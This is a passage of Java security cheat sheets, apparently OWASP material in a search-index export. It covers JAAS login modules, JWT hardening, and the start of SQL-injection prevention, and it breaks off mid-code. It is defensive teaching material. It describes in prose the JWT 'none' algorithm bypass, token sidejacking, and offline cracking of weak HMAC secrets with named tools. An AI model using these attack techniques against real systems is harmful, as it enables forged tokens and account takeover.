The JAAS configuration file contains a LoginModule stanza for each LoginModule available for logging on to the application.

A stanza from a JAAS configuration file:

Branches\n{\n    USNavy.AppLoginModule required\n    debug=true\n    succeeded=true;\n}\n

Note the placement of the semicolons, terminating both LoginModule entries and stanzas.

The word required indicates the LoginContext's login() method must be successful when logging in the user. The LoginModule-specific values debug and succeeded are passed to the LoginModule.

They are defined by the LoginModule and their usage is managed inside the LoginModule. Note that options are configured using key-value pairs such as debug=\"true\"; the key and value should be separated by an = sign.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#mainjava-the-client","title":"Main.java (The client)","text":"
java -Djava.security.auth.login.config==packageName/packageName.config\n        packageName.Main Stanza1\n\nWhere:\n    packageName is the directory containing the config file.\n    packageName.config specifies the config file in the Java package, packageName.\n    packageName.Main specifies Main.java in the Java package, packageName.\n    Stanza1 is the name of the stanza Main() should read from the config file.\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#loginmodulejava","title":"LoginModule.java","text":"

A LoginModule must have the following authentication methods:

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#initialize","title":"initialize()","text":"

In Main(), after the LoginContext reads the correct stanza from the config file, the LoginContext instantiates the LoginModule specified in the stanza.
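
A hedged sketch of an initialize() implementation that simply stores the references passed in by the LoginContext (the field names are assumptions):

//Hypothetical initialize() storing what the LoginContext passes to the LoginModule\npublic void initialize(Subject subject, CallbackHandler callbackHandler,\nMap<String, ?> sharedState, Map<String, ?> options) {\nthis.subject = subject;\nthis.callbackHandler = callbackHandler;\nthis.sharedState = sharedState;\n//LoginModule-specific options from the stanza, e.g. debug=true\nthis.options = options;\nthis.debug = \"true\".equalsIgnoreCase(String.valueOf(options.get(\"debug\")));\n}\n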

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#login","title":"login()","text":"

Captures user-supplied login information. The code snippet below declares an array of two callback objects which, when passed to the callbackHandler.handle method in the callbackHandler.java program, will be loaded with a username and password provided interactively by the user:

NameCallback nameCB = new NameCallback(\"Username\");\nPasswordCallback passwordCB = new PasswordCallback (\"Password\", false);\nCallback[] callbacks = new Callback[] { nameCB, passwordCB };\ncallbackHandler.handle (callbacks);\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#commit","title":"commit()","text":"

Once the user's credentials are successfully verified during login(), the JAAS authentication framework associates the credentials, as needed, with the subject.

There are two types of credentials, Public and Private:

Principals (i.e. identities the subject has other than their login name), such as an employee number or membership ID in a user group, are added to the subject.

Below is an example commit() method where, first, for each group the authenticated user has membership in, the group name is added as a principal to the subject. The subject's username is then added to their public credentials.

Code snippet setting and then adding any principals and public credentials to a subject:

public boolean commit() {\nif (userAuthenticated) {\nSet groups = UserService.findGroups(username);\nfor (Iterator itr = groups.iterator(); itr.hasNext();) {\nString groupName = (String) itr.next();\nUserGroupPrincipal group = new UserGroupPrincipal(groupName);\nsubject.getPrincipals().add(group);\n}\nUsernameCredential cred = new UsernameCredential(username);\nsubject.getPublicCredentials().add(cred);\n}\nreturn userAuthenticated;\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#abort","title":"abort()","text":"

The abort() method is called when authentication doesn't succeed. Before the abort() method exits the LoginModule, care should be taken to reset state including the username and password input fields.
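
A hedged sketch of such an abort() method (field names are assumptions):

//Hypothetical abort() resetting the state captured during login()\npublic boolean abort() {\n//Clear the captured credentials so they do not outlive the failed attempt\nusername = null;\npassword = null;\nuserAuthenticated = false;\nreturn true;\n}\n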

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#logout","title":"logout()","text":"

The release of the user's principals and credentials when LoginContext.logout is called:

public boolean logout() {\nif (!subject.isReadOnly()) {\nSet principals = subject.getPrincipals(UserGroupPrincipal.class);\nsubject.getPrincipals().removeAll(principals);\nSet creds = subject.getPublicCredentials(UsernameCredential.class);\nsubject.getPublicCredentials().removeAll(creds);\nreturn true;\n} else {\nreturn false;\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#callbackhandlerjava","title":"CallbackHandler.java","text":"

The callbackHandler is in a source (.java) file separate from any single LoginModule so that it can service a multitude of LoginModules with differing callback objects:

public void handle(Callback[] callbacks) {\nfor (int i = 0; i < callbacks.length; i++) {\nCallback callback = callbacks[i];\nif (callback instanceof NameCallback) {\nNameCallback nameCallBack = (NameCallback) callback;\nnameCallBack.setName(username);\n}  else if (callback instanceof PasswordCallback) {\nPasswordCallback passwordCallBack = (PasswordCallback) callback;\npasswordCallBack.setPassword(password.toCharArray());\n}\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#disclosure","title":"Disclosure","text":"

All of the code in the attached JAAS cheat sheet has been copied verbatim from this free source.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html","title":"JSON Web Token Cheat Sheet for Java","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Many applications use JSON Web Tokens (JWT) to allow the client to indicate its identity for further exchange after authentication.

From JWT.IO:

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA.

JSON Web Token is used to carry information related to the identity and characteristics (claims) of a client. This information is signed by the server so that it can detect whether it was tampered with after being sent to the client. This prevents an attacker from changing the identity or any characteristics (for example, changing the role from simple user to admin, or changing the client login).

This token is created during authentication (it is provided only in case of successful authentication) and is verified by the server before any processing. It is used by an application to allow a client to present a token representing the user's \"identity card\" to the server, and to allow the server to verify the validity and integrity of the token in a secure way, all of this in a stateless and portable approach (portable in the sense that client and server technologies can differ, as can the transport channel, even though HTTP is the most often used).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-structure","title":"Token Structure","text":"

Token structure example taken from JWT.IO:

[Base64(HEADER)].[Base64(PAYLOAD)].[Base64(SIGNATURE)]

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.\neyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.\nTJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\n

Chunk 1: Header

{\n\"alg\": \"HS256\",\n\"typ\": \"JWT\"\n}\n

Chunk 2: Payload

{\n\"sub\": \"1234567890\",\n\"name\": \"John Doe\",\n\"admin\": true\n}\n

Chunk 3: Signature

HMACSHA256( base64UrlEncode(header) + \".\" + base64UrlEncode(payload), KEY )\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheatsheet provides tips to prevent common security issues when using JSON Web Tokens (JWT) with Java.

The tips presented in this article are part of a Java project that was created to show the correct way to handle creation and validation of JSON Web Tokens.

You can find the Java project here; it uses the official JWT library.

In the rest of the article, the term token refers to the JSON Web Tokens (JWT).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#consideration-about-using-jwt","title":"Consideration about Using JWT","text":"

Even though a JWT is \"easy\" to use and allows services (mostly REST style) to be exposed in a stateless way, it is not the solution that fits all applications, because it comes with some caveats, such as the question of token storage (tackled in this cheatsheet) and others...

If your application does not need to be fully stateless, you can consider using the traditional session system provided by all web frameworks and follow the advice from the dedicated session management cheat sheet. However, for stateless applications, when well implemented, it's a good candidate.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#issues","title":"Issues","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#none-hashing-algorithm","title":"None Hashing Algorithm","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom","title":"Symptom","text":"

This attack, described here, occurs when an attacker alters the token and changes the hashing algorithm to indicate, through the none keyword, that the integrity of the token has already been verified. As explained in the link above, some libraries treated tokens signed with the none algorithm as valid tokens with a verified signature, so an attacker can alter the token claims and the modified token will still be trusted by the application.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent","title":"How to Prevent","text":"

First, use a JWT library that is not exposed to this vulnerability.

Second, during token validation, explicitly require that the expected algorithm was used.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example","title":"Implementation Example","text":"
// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Create a verification context for the token requesting\n//explicitly the use of the HMAC-256 hashing algorithm\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC)).build();\n\n//Verify the token; if the verification fails then an exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-sidejacking","title":"Token Sidejacking","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

This attack occurs when a token has been intercepted or stolen by an attacker and they use it to gain access to the system using the targeted user's identity.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_1","title":"How to Prevent","text":"

A way to prevent it is to add a \"user context\" in the token. A user context will be composed of the following information:

IP addresses should not be used because there are some legitimate situations in which the IP address can change during the same session. For example, when a user accesses an application through their mobile device and the mobile operator changes during the exchange, then the IP address may (often) change. Moreover, using the IP address can potentially cause issues with European GDPR compliance.

During token validation, if the received token does not contain the right context (for example, if it has been replayed), then it must be rejected.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_1","title":"Implementation example","text":"

Code to create the token after successful authentication.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n// Random data generator\nprivate SecureRandom secureRandom = new SecureRandom();\n\n...\n\n//Generate a random string that will constitute the fingerprint for this user\nbyte[] randomFgp = new byte[50];\nsecureRandom.nextBytes(randomFgp);\nString userFingerprint = DatatypeConverter.printHexBinary(randomFgp);\n\n//Add the fingerprint in a hardened cookie - Add cookie manually because\n//SameSite attribute is not supported by javax.servlet.http.Cookie class\nString fingerprintCookie = \"__Secure-Fgp=\" + userFingerprint\n+ \"; SameSite=Strict; HttpOnly; Secure\";\nresponse.addHeader(\"Set-Cookie\", fingerprintCookie);\n\n//Compute a SHA256 hash of the fingerprint in order to store the\n//fingerprint hash (instead of the raw value) in the token\n//to prevent an XSS to be able to read the fingerprint and\n//set the expected cookie itself\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create the token with a validity of 15 minutes and client context (fingerprint) information\nCalendar c = Calendar.getInstance();\nDate now = c.getTime();\nc.add(Calendar.MINUTE, 15);\nDate expirationDate = c.getTime();\nMap<String, Object> headerClaims = new HashMap<>();\nheaderClaims.put(\"typ\", \"JWT\");\nString token = JWT.create().withSubject(login)\n.withExpiresAt(expirationDate)\n.withIssuer(this.issuerID)\n.withIssuedAt(now)\n.withNotBefore(now)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.withHeader(headerClaims)\n.sign(Algorithm.HMAC256(this.keyHMAC));\n

Code to validate the token.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Retrieve the user fingerprint from the dedicated cookie\nString userFingerprint = null;\nif (request.getCookies() != null && request.getCookies().length > 0) {\nList<Cookie> cookies = Arrays.stream(request.getCookies()).collect(Collectors.toList());\nOptional<Cookie> cookie = cookies.stream().filter(c -> \"__Secure-Fgp\"\n.equals(c.getName())).findFirst();\nif (cookie.isPresent()) {\nuserFingerprint = cookie.get().getValue();\n}\n}\n\n//Compute a SHA256 hash of the received fingerprint in cookie in order to compare\n//it to the fingerprint hash stored in the token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create a verification context for the token\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC))\n.withIssuer(issuerID)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.build();\n\n//Verify the token, if the verification fail then an exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#no-built-in-token-revocation-by-the-user","title":"No Built-In Token Revocation by the User","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

This problem is inherent to JWT because a token only becomes invalid when it expires. The user has no built-in feature to explicitly revoke the validity of a token. This means that if a token is stolen, the user cannot revoke it themselves and thereby block the attacker.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_2","title":"How to Prevent","text":"

Since JWT tokens are stateless, there is no session maintained on the server(s) serving client requests. As such, there is no session to invalidate on the server side. A well-implemented Token Sidejacking solution (as explained above) should alleviate the need for maintaining a block list on the server side. This is because the hardened cookie used against Token Sidejacking can be considered as secure as a session ID used in a traditional session system, and unless both the cookie and the JWT are intercepted/stolen, the JWT is unusable. A logout can thus be 'simulated' by clearing the JWT from session storage. If the user chooses to close the browser instead, then both the cookie and sessionStorage are cleared automatically.

Another way to protect against this is to implement a token block list that will be used to mimic the \"logout\" feature that exists with traditional session management system.

The block list will keep a digest (SHA-256 encoded in HEX) of the token with a revocation date. This entry must endure at least until the expiration of the token.

When the user wants to \"logout\", they call a dedicated service that adds the provided user token to the block list, resulting in an immediate invalidation of the token for further usage in the application.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_2","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#block-list-storage","title":"Block List Storage","text":"

A database table with the following structure will be used as the central block list storage.

create table if not exists revoked_token(jwt_token_digest varchar(255) primary key,\nrevocation_date timestamp default now());\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-revocation-management","title":"Token Revocation Management","text":"

Code in charge of adding a token to the block list and checking if a token is revoked.

/**\n* Handle the revocation of the token (logout).\n* Use a DB in order to allow multiple instances to check for revoked token\n* and allow cleanup at centralized DB level.\n*/\npublic class TokenRevoker {\n\n/** DB Connection */\n@Resource(\"jdbc/storeDS\")\nprivate DataSource storeDS;\n\n/**\n  * Verify if a digest encoded in HEX of the ciphered token is present\n  * in the revocation table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @return Presence flag\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic boolean isTokenRevoked(String jwtInHex) throws Exception {\nboolean tokenIsPresent = false;\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Search token digest in HEX in DB\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"select jwt_token_digest from revoked_token where jwt_token_digest = ?\";\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ntry (ResultSet rSet = pStatement.executeQuery()) {\ntokenIsPresent = rSet.next();\n}\n}\n}\n}\n\nreturn tokenIsPresent;\n}\n\n\n/**\n  * Add a digest encoded in HEX of the ciphered token to the revocation token table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic void revokeToken(String jwtInHex) throws Exception {\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Check if the token digest in HEX is already in the DB and add it if it is absent\nif (!this.isTokenRevoked(jwtInHex)) {\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"insert into revoked_token(jwt_token_digest) values(?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ninsertedRecordCount = pStatement.executeUpdate();\n}\nif (insertedRecordCount != 1) {\nthrow new IllegalStateException(\"Number of inserted record is invalid,\" +\n\" 1 expected but is \" + insertedRecordCount);\n}\n}\n}\n\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-information-disclosure","title":"Token Information Disclosure","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

This attack occurs when an attacker has access to a token (or a set of tokens) and extracts the information stored in it (the contents of JWT tokens are base64 encoded, but are not encrypted by default) in order to obtain information about the system. The information can be, for example, the security roles, the login format...

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_3","title":"How to Prevent","text":"

A way to protect against this attack is to cipher the token using, for example, a symmetric algorithm.

It's also important to protect the ciphered data against attacks like padding oracle attacks or any other attacks using cryptanalysis.

In order to achieve all these goals, the AES-GCM algorithm is used which provides Authenticated Encryption with Associated Data.

More details from here:

AEAD primitive (Authenticated Encryption with Associated Data) provides functionality of symmetric\nauthenticated encryption.\n\nImplementations of this primitive are secure against adaptive chosen ciphertext attacks.\n\nWhen encrypting a plaintext one can optionally provide associated data that should be authenticated\nbut not encrypted.\n\nThat is, the encryption with associated data ensures authenticity (ie. who the sender is) and\nintegrity (ie. data has not been tampered with) of that data, but not its secrecy.\n\nSee RFC5116: https://tools.ietf.org/html/rfc5116\n

Note:

Here, ciphering is added mainly to hide internal information, but it's very important to remember that the first protection against tampering with the JWT is the signature. So the token signature and its verification must always be in place.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_3","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-ciphering","title":"Token Ciphering","text":"

Code in charge of managing the ciphering. The dedicated crypto library Google Tink is used to handle ciphering operations in order to benefit from the built-in best practices provided by this library.

/**\n * Handle ciphering and deciphering of the token using AES-GCM.\n *\n * @see \"https://github.com/google/tink/blob/master/docs/JAVA-HOWTO.md\"\n */\npublic class TokenCipher {\n\n/**\n     * Constructor - Register AEAD configuration\n     *\n     * @throws Exception If any issue occur during AEAD configuration registration\n     */\npublic TokenCipher() throws Exception {\nAeadConfig.register();\n}\n\n/**\n     * Cipher a JWT\n     *\n     * @param jwt          Token to cipher\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The ciphered version of the token encoded in HEX\n     * @throws Exception If any issue occur during token ciphering operation\n     */\npublic String cipherToken(String jwt, KeysetHandle keysetHandle) throws Exception {\n//Verify parameters\nif (jwt == null || jwt.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified!\");\n}\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Cipher the token\nbyte[] cipheredToken = aead.encrypt(jwt.getBytes(), null);\n\nreturn DatatypeConverter.printHexBinary(cipheredToken);\n}\n\n/**\n     * Decipher a JWT\n     *\n     * @param jwtInHex     Token to decipher encoded in HEX\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The token in clear text\n     * @throws Exception If any issue occur during token deciphering operation\n     */\npublic String decipherToken(String jwtInHex, KeysetHandle keysetHandle) throws Exception {\n//Verify parameters\nif (jwtInHex == null || jwtInHex.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified !\");\n}\n\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Decipher the token\nbyte[] decipheredToken = aead.decrypt(cipheredToken, null);\n\nreturn new String(decipheredToken);\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#creation-validation-of-the-token","title":"Creation / Validation of the Token","text":"

Use the token ciphering handler during the creation and the validation of the token.

Load keys (the ciphering key was generated and stored using Google Tink) and set up the cipher.

//Load keys from configuration text/json files in order to avoid storing keys as a String in JVM memory\nprivate transient byte[] keyHMAC = Files.readAllBytes(Paths.get(\"src\", \"main\", \"conf\", \"key-hmac.txt\"));\nprivate transient KeysetHandle keyCiphering = CleartextKeysetHandle.read(JsonKeysetReader.withFile(\nPaths.get(\"src\", \"main\", \"conf\", \"key-ciphering.json\").toFile()));\n\n...\n\n//Init token ciphering handler\nTokenCipher tokenCipher = new TokenCipher();\n

Token creation.

//Generate the JWT token using the JWT API...\n//Cipher the token (String JSON representation)\nString cipheredToken = tokenCipher.cipherToken(token, this.keyCiphering);\n//Send the ciphered token encoded in HEX to the client in HTTP response...\n

Token validation.

//Retrieve the ciphered token encoded in HEX from the HTTP request...\n//Decipher the token\nString token = tokenCipher.decipherToken(cipheredToken, this.keyCiphering);\n//Verify the token using the JWT API...\n//Verify access...\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-storage-on-client-side","title":"Token Storage on Client Side","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

This occurs when an application stores the token in a manner exhibiting the following behavior:

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_4","title":"How to Prevent","text":"
  1. Store the token using the browser sessionStorage container, or use JavaScript closures with private variables
  2. Add it as a Bearer HTTP Authentication header with JavaScript when calling services.
  3. Add fingerprint information to the token.

Storing the token in the browser's sessionStorage container exposes the token to being stolen through an XSS attack. However, fingerprints added to the token prevent reuse of a stolen token by the attacker on their own machine. To close as many exploitation surfaces as possible for an attacker, add a browser Content Security Policy to harden the execution context.

An alternative to storing the token in browser sessionStorage is to use a JavaScript closure with a private variable. In this approach, access to all web requests is routed through a JavaScript module that encapsulates the token in a private variable which cannot be accessed other than from within the module.

Note:

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_4","title":"Implementation Example","text":"

JavaScript code to store the token after authentication.

/* Handle request for JWT token and local storage*/\nfunction authenticate() {\nconst login = $(\"#login\").val();\nconst postData = \"login=\" + encodeURIComponent(login) + \"&password=test\";\n\n$.post(\"/services/authenticate\", postData, function (data) {\nif (data.status == \"Authentication successful!\") {\n...\nsessionStorage.setItem(\"token\", data.token);\n}\nelse {\n...\nsessionStorage.removeItem(\"token\");\n}\n})\n.fail(function (jqXHR, textStatus, error) {\n...\nsessionStorage.removeItem(\"token\");\n});\n}\n

JavaScript code to add the token as a Bearer HTTP Authentication header when calling a service, for example a token validation service here.

/* Handle request for JWT token validation */\nfunction validateToken() {\nvar token = sessionStorage.getItem(\"token\");\n\nif (token == undefined || token == \"\") {\n$(\"#infoZone\").removeClass();\n$(\"#infoZone\").addClass(\"alert alert-warning\");\n$(\"#infoZone\").text(\"Obtain a JWT token first :)\");\nreturn;\n}\n\n$.ajax({\nurl: \"/services/validate\",\ntype: \"POST\",\nbeforeSend: function (xhr) {\nxhr.setRequestHeader(\"Authorization\", \"bearer \" + token);\n},\nsuccess: function (data) {\n...\n},\nerror: function (jqXHR, textStatus, error) {\n...\n},\n});\n}\n

JavaScript code to implement closures with private variables:

function myFetchModule() {\n// Protect the original 'fetch' from getting overwritten via XSS\nconst fetch = window.fetch;\n\nconst authOrigins = [\"https://yourorigin\", \"http://localhost\"];\nlet token = '';\n\nthis.setToken = (value) => {\ntoken = value\n}\n\nthis.fetch = (resource, options) => {\nlet req = new Request(resource, options);\ndestOrigin = new URL(req.url).origin;\nif (token && authOrigins.includes(destOrigin)) {\nreq.headers.set('Authorization', token);\n}\nreturn fetch(req)\n}\n}\n\n...\n\n// usage:\nconst myFetch = new myFetchModule()\n\nfunction login() {\nfetch(\"/api/login\")\n.then((res) => {\nif (res.status == 200) {\nreturn res.json()\n} else {\nthrow Error(res.statusText)\n}\n})\n.then(data => {\nmyFetch.setToken(data.token)\nconsole.log(\"Token received and stored.\")\n})\n.catch(console.error)\n}\n\n...\n\n// after login, subsequent api calls:\nfunction makeRequest() {\nmyFetch.fetch(\"/api/hello\", {headers: {\"MyHeader\": \"foobar\"}})\n.then((res) => {\nif (res.status == 200) {\nreturn res.text()\n} else {\nthrow Error(res.statusText)\n}\n}).then(responseText => console.log(\"helloResponse\", responseText))\n.catch(console.error)\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#weak-token-secret","title":"Weak Token Secret","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

When the token is protected using an HMAC based algorithm, the security of the token is entirely dependent on the strength of the secret used with the HMAC. If an attacker can obtain a valid JWT, they can then carry out an offline attack and attempt to crack the secret using tools such as John the Ripper or Hashcat.

If they are successful, they would then be able to modify the token and re-sign it with the key they had obtained. This could let them escalate their privileges, compromise other users' accounts, or perform other actions depending on the contents of the JWT.

There are a number of guides that document this process in greater detail.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_5","title":"How to Prevent","text":"

The simplest way to prevent this attack is to ensure that the secret used to sign the JWTs is strong and unique, in order to make it harder for an attacker to crack. As this secret would never need to be typed by a human, it should be at least 64 characters, and generated using a secure source of randomness.
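
A hedged sketch of generating such a secret with a secure source of randomness (the value would be stored in the application configuration or a secret store, never hard-coded):

import java.security.SecureRandom;\nimport java.util.Base64;\n\n//Hypothetical one-off generation of a strong secret for signing JWTs with an HMAC\nSecureRandom random = new SecureRandom();\nbyte[] secret = new byte[64];\nrandom.nextBytes(secret);\n//Store this value in the application configuration / secret store\nString encodedSecret = Base64.getEncoder().encodeToString(secret);\nSystem.out.println(encodedSecret);\n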

Alternatively, consider the use of tokens that are signed with RSA rather than using an HMAC and secret key.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html","title":"Java Security Cheat Sheet","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#injection-prevention-in-java","title":"Injection Prevention in Java","text":"

This section aims to provide tips to handle Injection in Java application code.

Sample code used in tips is located here.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#what-is-injection","title":"What is Injection","text":"

Injection in the OWASP Top 10 is defined as follows:

Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-advices-to-prevent-injection","title":"General advices to prevent Injection","text":"

The following points can be applied, in a general way, to prevent Injection issues:

  1. Apply Input Validation (using \"allow list\" approach) combined with Output Sanitizing+Escaping on user input/output.
  2. If you need to interact with the system, try to use API features provided by your technology stack (Java / .Net / PHP...) instead of building commands.

Additional advice is provided in this cheatsheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#specific-injection-types","title":"Specific Injection types","text":"

Examples in this section are provided in Java (see the associated Maven project), but the advice is applicable to other technologies like .Net / PHP / Ruby / Python...

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#sql","title":"SQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an SQL query using a String and executes it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent","title":"How to prevent","text":"

Use Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example","title":"Example","text":"
/*No DB framework used here in order to show the real use of\n  Prepared Statement from Java API*/\n/*Open connection with H2 database and use it*/\nClass.forName(\"org.h2.Driver\");\nString jdbcUrl = \"jdbc:h2:file:\" + new File(\".\").getAbsolutePath() + \"/target/db\";\ntry (Connection con = DriverManager.getConnection(jdbcUrl)) {\n\n/* Sample A: Select data using Prepared Statement*/\nString query = \"select * from color where friendly_name = ?\";\nList<String> colors = new ArrayList<>();\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"yellow\");\ntry (ResultSet rSet = pStatement.executeQuery()) {\nwhile (rSet.next()) {\ncolors.add(rSet.getString(1));\n}\n}\n}\n\n/* Sample B: Insert data using Prepared Statement*/\nquery = \"insert into color(friendly_name, red, green, blue) values(?, ?, ?, ?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\npStatement.setInt(2, 239);\npStatement.setInt(3, 125);\npStatement.setInt(4, 11);\ninsertedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample C: Update data using Prepared Statement*/\nquery = \"update color set blue = ? where friendly_name = ?\";\nint updatedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setInt(1, 10);\npStatement.setString(2, \"orange\");\nupdatedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample D: Delete data using Prepared Statement*/\nquery = \"delete from color where friendly_name = ?\";\nint deletedRecordCount;\ntry 